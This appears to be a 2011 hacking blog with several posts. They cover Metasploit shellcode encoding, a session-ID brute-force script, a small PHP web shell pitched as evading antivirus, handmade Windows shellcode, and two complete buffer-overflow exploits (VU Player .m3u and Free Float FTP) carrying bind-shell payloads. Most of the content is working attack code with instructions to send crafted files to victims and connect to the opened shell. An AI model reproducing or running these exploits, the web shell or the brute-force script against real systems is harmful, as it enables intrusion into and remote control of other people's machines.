Framework Encoders (architectures: x86)
=======================================

Name                    Rank       Description
----                    ----       -----------
generic/none            normal     The "none" Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit   manual     Single Static Bit
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
The default encoder in Metasploit is x86/shikata_ga_nai

Suppose you have just written the follwoing shell code
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
So to encode the shell code first you have to write the shell code into a binary file.So to do that you can choose any scripting langugae.

Here i will use python.
shell = ("\x68\x6c\x61\x6e\x00\x68\x43\x6f
\x72\x65\x89\xe3\x68\x61\x6e\x20
\x00\x68\x6f\x72\x65\x6c\x68\x62
\x79\x20\x43\x68\x6e\x65\x64\x20
\x68\x6e\x20\x70\x77\x68\x20\x62
\x65\x65\x68\x68\x61\x76\x65\x68
\x59\x6f\x75\x20\x89\xe1\x31\xc0
\x50\x53\x51\x50\x50\xbe\xea\x07
\x45\x7e\xff\xe6\x31\xc0\x50\xb8
\x12\xcb\x81\x7c\xff\xe0")
file = open('shellcode.bin','w')
file.write(shell)
file.close()


After running the script you will get a shell.bin file.Now you are almost done.You just have to fire msfencode to encode the shell code for you.

root@bt:~#./msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c";
So this is the Bad character and Null free fully working shell code.

Encode using x86/alpha_mixed

root@bt:~#./msfencode -e x86/alpha_mixed -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/alpha_mixed succeeded with size 218 (iteration=1)

unsigned char buf[] =
"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
"\x43\x4c\x4b\x4f\x4d\x30\x41\x41";

Saturday, October 15, 2011

Thursday, October 13, 2011

Session ID Brute force

Few days back i was conducting a pen-test of an e commerce application.
Like many other application i found a very common vulnerability in that application
The vulnerability was "Session not Invalidate after logout".
So one attacker can easily use a session id to access victims account even after logout is done.

The big deal was, at the time of account creation the application assigns a session ID for a particular account.
So whenever the user logs into his/her account the application will always assign same session Id.
So if you think in other way then you will find that, it’s like a password.
But as a Hacker point of view one dis-advantage of password protection is you can change the password,
But advantages with this scenario is
Even if a user changes the password the Session id does not change.
And the session id for every account is fixed length.

And one important thing was, Account lockout was present in that application. So if someone try to brute force the login panel it will not work.

So i decided to brute force the session id.

As the application was hosted on a staging environment’s was free to do whatever attack i want against the web server.
This brute force was bit different from, password cracking because maximum time you don’t have any idea about the password length.
But in this case the length of the parameter to be brute forced was known to me.
So it was quite big advantage.
One challenge i have faced was the band width of the staging environment.
The server was responding too slowly.
Like always i used python to automate the whole process.

Here is the single threaded python script.

import httplib, urllib
import gzip
import StringIO
import random
 
#HOST = '127.0.0.1'
HOST = 'somesite.com'
def go(D):
    print "Trying..",D
    conn = httplib.HTTPConnection(HOST)
    headers = {"Host": "somesite.com",
               "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
               "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Accept-Language:": "en-us,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
               "Proxy-Connection": "keep-alive",
               "Referer": "http://somesite.com/ac/",
               "Pragma": "no-cache",
               "Cookie": D, }
    conn.request("GET", "/home", "", headers)
    response = conn.getresponse()
    print response.status, response.reason
    compresseddata = response.read()
    compressedstream = StringIO.StringIO(compresseddata)  
    gzipper = gzip.GzipFile(fileobj=compressedstream)      
    data = gzipper.read()
    #print data
    if "window.location.href" in data:
        print "Sorry...."
    else:
        w = open('success.txt','a')
        w.write(D)
    print "Done.."
 
#Generate SID
pre = "SID="
max = 25#Maximum Length of Random character
t = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"
l = len(t)
buff = ''
while 1:
    if len(buff) == max:
        #print buff
        final = str(pre)+str(buff)
        go(final)
        buff = ''
    a = random.randint(0, l)
    b = a+1
    buff += t[a:-l+b]

But i was not successful.
Even after 5 days,i haven’t got a single account id.
Most probably the main reason behind this UN-successful attack was "The staging environment".
To check that, I have created an account in the main application and tried to access the account from the staging environment.
The credentials were not working in the test environment.
So its quite clear form this that the no. of account very less in the test environment, so probability of getting a valid account was too less in the test environment.

Portable PHP Script to execute Shell command

This small PHP script can be used to execute shell command on a web server.
Some time PHP shells like c99.php gets detected by AVS.So in that case this small php script is very use full.And some time the size of the file to be uploaded is very essential,IF the application is filtering upload by size then also this script can be used.

USAGE : This script accepts shell command as GET requests,so just upload this script,and execute command like this

http://www.site.com/cmd.php?c=

eg. http://www.site.com/cmd.php?c=ifconfig

You will see the out put of that command.

<?php
$cmd = $_GET["c"];
if ($cmd == "") 
{
echo "<B>Usage :: http://www.site.com/cmd.php?c=<your command></B>";
}
else
{
$output = null;
exec($cmd, $output);
echo "<pre>" . var_export($output, TRUE) . "</pre>\\n";
}
?>

Monday, October 10, 2011

Open all PORTS

This multi threaded python script can be used to open a certain range of TCP port of a PC.
If you are conducting network security scans,then its very important to check if your ISP's firewall is filtering any packet/ports or not.Your scan result may contain false+ve if your ISP is blocking any malicious packets.
So you can use the script to open all ports of a sample target and probe the target with various crafted packets.(ex. Nmap,Nessus)
If the scan result returns the expected result,Then its fine,but if you get some ports are closed but,you know that its open then its a thing to worry for security scanning.
You have to change the 2nd last line to select the tcp PORT range.

Here is the python script:

import socket
import thread
from threading import *
def handler(clientsock,addr):
    while 1:
        data = clientsock.recv(BUFSIZ)
        if not data:
            break
def openport(PORT):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    HOST = socket.gethostname()
    #PORT = 1234
    BUFSIZ = 1024
    s.bind((HOST,PORT))
    s.listen(5)
    print 'Listening on port :',PORT
    while 1:
        print 'Waiting for connection:'
        clientsock, addr = s.accept()
        print 'Connected with: ', addr
        thread.start_new_thread(handler, (clientsock, addr))
        for P in range(1,5):    #The port range to open
            thread.start_new_thread(openport, (P,))

My first Handmade shell code!!

What is shell code?? (Wiki Definition)
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of software vulnerability.
Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode.
It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine.
An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.

Shell code can be of two types.

Local Shell code and Remote Shell code.
Here i will write a simple Local shell code which will just generate a "MessageBOX"
Tools i generally use for shell coding are....
1)Nasm (Assembler )
2)Objdump(You can get this with Dev C++)
3)Dev C++
4)Ollydebug or you can use any debugger.
5)Arwin The C code freely available ,Get that and compile with any c compiler.


I did this entire thing on windows platform but,if you are a linux user you can do the same thing on any distribution of Linux.
But the main difference between Linux and windows shell code is
Linux, unlike windows, provides a direct way to interface with the kernel through the int 0x80 interface.
Windows on the other hand, does not have a direct kernel interface. The system must be interfaced by loading .the address of the function that needs to be executed from a DLL (Dynamic Link Library).The key difference between the two is the fact that the address of the functions found in windows will vary from OS version to OS version while the int 0x80 syscall numbers will remain constant.
First thing you have do while writing a working shell code for windows platform is, find the addresses of your needed DLL functions.

So to do that the tool i generally use is arwin.You can do the same thing by using any debugger. I will not explain that but using arwin is much simpler and easier.
The library functions i will be using for this simple shell code are "LoadLibraryA",'GetProcAddress", "MessageBoxA" and "ExitProcess"
Let's fire up arwin and find the addresses we need to use.
You just have to do the following things to get addresses of our required functions...

D:\exploitkit\arwin>arwin kernel32.dll GetProcAddress
arwin - win32 address resolution program - by steve hanna - v.01
GetProcAddress is located at 0x77e7b332 in kernel32.dll

D:\exploitkit\arwin>arwin kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x77e7d961 in kernel32.dll


D:\exploitkit\arwin>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll



Now we have the required addresses...


After getting that you have to write down the code into assembly....so here is the code.....

; Assembly code starts here.....
[SECTION .text]

global _start


_start:

xor eax,eax
xor ebx,ebx   ;zero out the registers
xor ecx,ecx
xor edx,edx

jmp short GetLibrary
LibraryReturn:
pop ecx   
mov [ecx + 10], dl 
mov ebx, 0x77e7d961  ;LoadLibraryA(libraryname);
push ecx   ;beginning of user32.dll
call ebx  

jmp short FunctionName
FunctionReturn:

pop ecx  
xor edx,edx
mov [ecx + 11],dl 
push ecx
push eax
mov ebx, 0x77e7b332  ;GetProcAddress(hmodule,functionname);
call ebx   

jmp short Message
MessageReturn:
pop ecx    ;get the message string
xor edx,edx   
mov [ecx+3],dl  

xor edx,edx

push edx   ;MB_OK
push ecx   ;title
push ecx   ;message
push edx   ;NULL window handle

call eax   ;MessageBoxA(windowhandle,msg,title,type); Addre

ender:
xor edx,edx
push eax   
mov eax, 0x77e798fd   ;Address of Exitprocess;
call eax   ;exit cleanly so we don't crash the parent program



GetLibrary:
call LibraryReturn
db 'user32.dllN'
FunctionName
call FunctionReturn
db 'MessageBoxAN'
Message
call MessageReturn
db 'You are Hacked by Raza'

After that save the code as Shell.asm


Now its time to get the raw binary of the code we have just written.


To do that you have to use nasm assembler and objdump.

D:\exploitkit\nasm>nasm -f elf shell.asm
D:\exploitkit\>ld.exe -o shell shell.o
D:\exploitkit>objdump -d shell

The out put will be like this…
shell:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080:       31 c0                   xor    %eax,%eax
8048082:       31 db                   xor    %ebx,%ebx
8048084:       31 c9                   xor    %ecx,%ecx
8048086:       31 d2                   xor    %edx,%edx

8048088:       eb 37                   jmp    80480c1 

0804808a :
804808a:       59                      pop    %ecx
804808b:       88 51 0a                mov    %dl,0xa(%ecx)
804808e:       bb 61 d9 e7 77          mov    $0x77e7d961,%ebx
8048093:       51                      push   %ecx
8048094:       ff d3                   call   *%ebx
8048096:       eb 39                   jmp    80480d1 

08048098 :
8048098:       59                      pop    %ecx
8048099:       31 d2                   xor    %edx,%edx
804809b:       88 51 0b                mov    %dl,0xb(%ecx)
804809e:       51                      push   %ecx
804809f:       50                      push   %eax
80480a0:       bb 32 b3 e7 77          mov    $0x77e7b332,%ebx
80480a5:       ff d3                   call   *%ebx
80480a7:       eb 39                   jmp    80480e2 

080480a9 :
80480a9:       59                      pop    %ecx
80480aa:       31 d2                   xor    %edx,%edx
80480ac:       88 51 03                mov    %dl,0x3(%ecx)
80480af:       31 d2                   xor    %edx,%edx
80480b1:       52                      push   %edx
80480b2:       51                      push   %ecx
80480b3:       51                      push   %ecx
80480b4:       52                      push   %edx
80480b5:       ff d0                   call   *%eax

080480b7 :
80480b7:       31 d2                   xor    %edx,%edx
80480b9:       50                      push   %eax
80480ba:       b8 fd 98 e7 77          mov    $0x77e798fd,%eax
80480bf:       ff d0                   call   *%eax

080480c1 :
80480c1:       e8 c4 ff ff ff          call   804808a 
80480c6:       75 73                   jne    804813b 
80480c8:       65                      gs
80480c9:       72 33                   jb     80480fe 
80480cb:       32 2e                   xor    (%esi),%ch
80480cd:       64                      fs
80480ce:       6c                      insb   (%dx),%es:(%edi)
80480cf:       6c                      insb   (%dx),%es:(%edi)
80480d0:       4e                      dec    %esi

080480d1 :
80480d1:       e8 c2 ff ff ff          call   8048098 
80480d6:       4d                      dec    %ebp
80480d7:       65                      gs
80480d8:       73 73                   jae    804814d 
80480da:       61                      popa  
80480db:       67                      addr16
80480dc:       65                      gs
80480dd:       42                      inc    %edx
80480de:       6f                      outsl  %ds:(%esi),(%dx)
80480df:       78 41                   js     8048122 
80480e1:       4e                      dec    %esi

080480e2 :
80480e2:       e8 c2 ff ff ff          call   80480a9 
80480e7:       48                      dec    %eax
80480e8:       65                      gs
80480e9:       79 4e                   jns    8048139</code>

Now we are almost done. We just have to collect the machine code from the command prompt output.

So our final shell code will looks like...
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
"\xff\x48\x65\x79\x4e"

To test shell codes the code i use is following...


/*shellcodetest.c*/

char code[] = "opcode will go here!";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}



Just put your shell code into code[] and compile it with devC++
When you will execute it you should get a message box if everything is fine....

Wednesday, September 28, 2011

VU Player stack buffer overflow Local Exploit

This is VU player stack buffer overflow exploit.This is a local exploit.
When you run this exploit a malformes .m3u file will be generated.
Change the shell code accroding to your purpose.
The shell code i have added is bad character free windows_shell_bind_tcp generated from metasploit frmae work.
If you use this shell code,After victim open the malformed m3u,you just have to telnet thr victim on port 1234 to get shell.

I have submitted the code @ injector vulnerability database
you can also find it @ http://1337day.com/exploits/16741
# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Email debasishm89@gmail.com
# Software Link: http://www.brothersoft.com/vuplayer-62979.html
# Category:: Local
# Tested on: Windows XP SP2.


#!/usr/bin/python
from struct import pack
print "######################################################"
print "##   VU Player Local BO Exploit                     ##"
print "##   http://www.brothersoft.com/vuplayer-62979.html ##"
print "##   Author :: Debasish Mandal                      ##"
print "##   Email : debasishm89@gmail.com                  ##"
print "##   http://www.facebook.com/raza.whitehat          ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")
f = open('victim.m3u','w')
junk = "A"*1012
eip = pack('<L',0x77D7754A)  # JMP ESP @ USER32.dll
nop = "\x90" *10    # NOPs [To make the exploit smooth]

#Shell Code Starts Here
#List bad characters \x00  \x09   \x0a  \x1a
#Generated form Metasploit Framework
#Name : windows/shell/bind_tcp
#LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
"\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0"
"\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12"
"\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d"
"\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99"
"\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73"
"\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d"
"\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a"
"\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7"
"\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58"
"\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2"
"\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85"
"\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb"
"\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4"
"\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a"
"\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5"
"\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b"
"\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e"
"\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b"
"\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d"
"\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d"
"\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67")
payload = (junk+eip+nop+shellcode)
print "[*]Writinng payload to the file victim.m3u"
f.write(payload)
f.close()
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"


# 1337day.com [2011-08-22

Free Float Ftp server stack buffer overflow

First of all i fired Metasploit Fuzzer aginst this FTP server.The fuzzer worked like butter.
Near 250 bytes of Junk the program crashed and checked the yahoooooo....the offset was overwritten with metasploit pattern.
I started writing the exploit.Like always python is my best choice for writing exploits.So the exploit code is in python.
The shell code added with the exploit is windows_shell_bind_tcp.it spawns a bindshell on port 1234.
generated form Metasplot frmaework.
The bad characters are removed form the shell code using metasplot encoder.

I have published this exploit @ packet sortm security and Injector


You can find the exploit code @

http://packetstormsecurity.org/files/author/9123/


http://1337day.com/exploits/16737
# Exploit Title: Free Float FTP server Response stack Buffer Overflow Exploit
# Date: 21-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php
# Version: 1.0
# Category:: Remote
# Tested on: Windows XP SP2.


#!/usr/bin/python

import  socket,sys
from struct import pack

buff = "A"* 251 
junk = "A"*5
nop = "\x90"*20
eip = pack('<L',0x77F5801C)

#Shell code generated by Metasploit frmaework.
#Shell Code :: windows/shell/bind_tcp.
#Local PORT :: 1234.
#Neglected BAD CHARACTERS  are "\x00","\x0a" &\x0d".
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41"
"\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1"
"\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77"
"\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88"
"\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2"
"\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee"
"\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5"
"\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0"
"\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9"
"\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62"
"\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3"
"\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a"
"\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3"
"\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9"
"\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88"
"\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec"
"\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f"
"\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4"
"\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10"
"\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c"
"\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a")

buff += eip
buff += nop
buff += shellcode
buff += junk
HOST = raw_input("Enter the target host : ")
PORT = raw_input("Enter the targer port (Default 21): ")
print "[*] Connecting to the host "+HOST+" on port "+PORT 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect((HOST, int(PORT)))
print "[*]Connected to target FTP Server!"
except:
print "[*] FTP Server didn't respond\n"
sys.exit(0)
data=s.recv(1024)
print "[*]Sending PAYLOAD to the target server"
s.send(buff+'\r\n')
print "[*]Exploit Completed..."
print "[*]Now telnet to the server on port 1234"


# 1337day.com [2011-08-21]